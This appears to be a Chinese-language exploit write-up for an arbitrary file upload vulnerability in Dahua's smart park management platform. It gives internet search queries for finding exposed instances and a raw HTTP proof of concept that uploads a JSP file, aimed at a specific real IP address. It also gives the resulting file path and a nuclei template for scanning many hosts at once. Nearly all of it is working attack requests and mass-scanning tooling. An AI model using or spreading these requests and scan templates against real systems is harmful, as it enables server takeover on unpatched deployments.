大华智慧园区综合管理平台 video 任意文件上传漏洞
漏洞描述
大华 智慧园区综合管理平台 video 接口存在任意文件上传漏洞,攻击者通过漏洞可以上传任意文件到服务器中,控制服务器权限
漏洞复现
fofa语句:"/WPMS/asset/lib/gridster/"或app="dahua-智慧园区综合管理平台"
鹰图语句:web.body="/WPMS/asset/lib/gridster/"
登录页面如下:
POC:
POST /publishing/publishing/material/file/video HTTP/1.1
Host: 112.29.98.167:8009
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 804
Content-Type: multipart/form-data; boundary=dd8f988919484abab3816881c55272a7
Accept-Encoding: gzip, deflate
Connection: close
--dd8f988919484abab3816881c55272a7
Content-Disposition: form-data; name="Filedata"; filename="Test.jsp"
Test
--dd8f988919484abab3816881c55272a7
Content-Disposition: form-data; name="Submit"
submit
--dd8f988919484abab3816881c55272a7--
上传文件后的路径:/publishingImg/VIDEO/230812152005170200.jsp
nuclei批量yaml脚本
id: Dahua_video_fileupload
info:
name: 大华智慧园区综合管理平台 video 任意文件上传漏洞
author: mhb17
severity: critical
description: description
reference:
- https://peiqi.wgpsec.org/wiki/iot/%E5%A4%A7%E5%8D%8E/%E5%A4%A7%E5%8D%8E%20%E6%99%BA%E6%85%A7%E5%9B%AD%E5%8C%BA%E7%BB%BC%E5%90%88%E7%AE%A1%E7%90%86%E5%B9%B3%E5%8F%B0%20video%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.html
tags: fileupload
requests:
- raw:
- |-
POST /publishing/publishing/material/file/video HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 243
Content-Type: multipart/form-data; boundary=dd8f988919484abab3816881c55272a7
Accept-Encoding: gzip, deflate
Connection: close
--dd8f988919484abab3816881c55272a7
Content-Disposition: form-data; name="Filedata"; filename="Test.jsp"
Test
--dd8f988919484abab3816881c55272a7
Content-Disposition: form-data; name="Submit"
submit
--dd8f988919484abab3816881c55272a7--
matchers-condition: and
matchers:
- type: word
part: body
words:
- success!
- type: word
part: header
words:
- '200'
